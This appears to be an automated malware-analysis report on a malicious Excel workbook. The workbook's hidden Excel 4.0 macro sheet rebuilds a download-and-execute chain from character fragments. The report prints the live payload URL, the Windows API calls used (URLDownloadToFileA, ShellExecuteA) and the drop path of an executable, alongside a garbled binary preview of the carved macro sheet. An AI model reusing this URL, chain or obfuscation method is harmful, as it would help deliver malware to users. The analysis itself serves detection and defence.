MALICIOUS
182
Risk Score
Heuristics 4
-
Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
-
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOADAn Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
-
URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://159.89.9.74/campo/t/t Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.bin |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 2606 bytes |
SHA-256: e6ec2500101d372ffa78e9161d3230d8c3e1a08923f02ab560fb280522ca4c95 |
|||
Preview scriptFirst 1,000 lines of the extracted script
� � � @ �������� � � % �� & � � @ d � $ � � % �� & � ���� , � < # < m < $ < � < �
< $ < < �? $ � � % �� & , � &�� � K Ao e Ao r Ao n Ao e Ao l Ao 3 Ao 2 Ao C Ao r Ao e Ao a Ao t Ao e Ao D Ao i Ao r Ao e Ao c Ao t Ao o Ao r Ao y Ao A Ao J C J N E R O B � % �� & , % �� & , � ����� � U Ao r Ao l Ao m Ao o Ao n Ao U Ao R Ao L Ao D Ao o Ao w Ao n Ao l Ao o Ao a Ao d Ao T Ao o Ao F Ao i Ao l Ao e Ao A Ao J J C C J J V E R O B � % �� & , % �� & , � ��A � S Ao h Ao e Ao l Ao l Ao 3 Ao 2 Ao S Ao h Ao e Ao l Ao l Ao E Ao x Ao e Ao c Ao u Ao t Ao e Ao A Ao J J C C C C J B E R O B � % �� & , , �? B % �� & , % �� & , - # $ � B � % �� & , % �� &
,
} j # h t t p : / / 1 5 9 . 8 9 . 9 . 7 4 / c a m p o / t / t @ D � \ h 3 . e x e B � % �� & , % �� & ,
b O # o Ao p Ao e Ao n Ao D � \ h 3 . e x e C : \ B � % �� & ,
B 6 % �� & , � C : \ U s e r s \ P u b l i c \ n 2 2 � C Ao : Ao \ Ao U Ao s Ao e Ao r Ao s Ao \ Ao P Ao u Ao b Ao l Ao i Ao c Ao \ Ao n Ao 2 Ao 2 Ao � � � �� @ :*i�,ȝ"�U��6 x
W� �R�[� �����"~P�O��R� Rc=$c� �ړ��] p7�pV~ �� ?M Ӣ ~b��� �� S H A - 5 1 2 � B � �y� 0ffffff�?ffffff�? �? �?333333�?333333�?� . d X X r I d 2 % �� & �
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.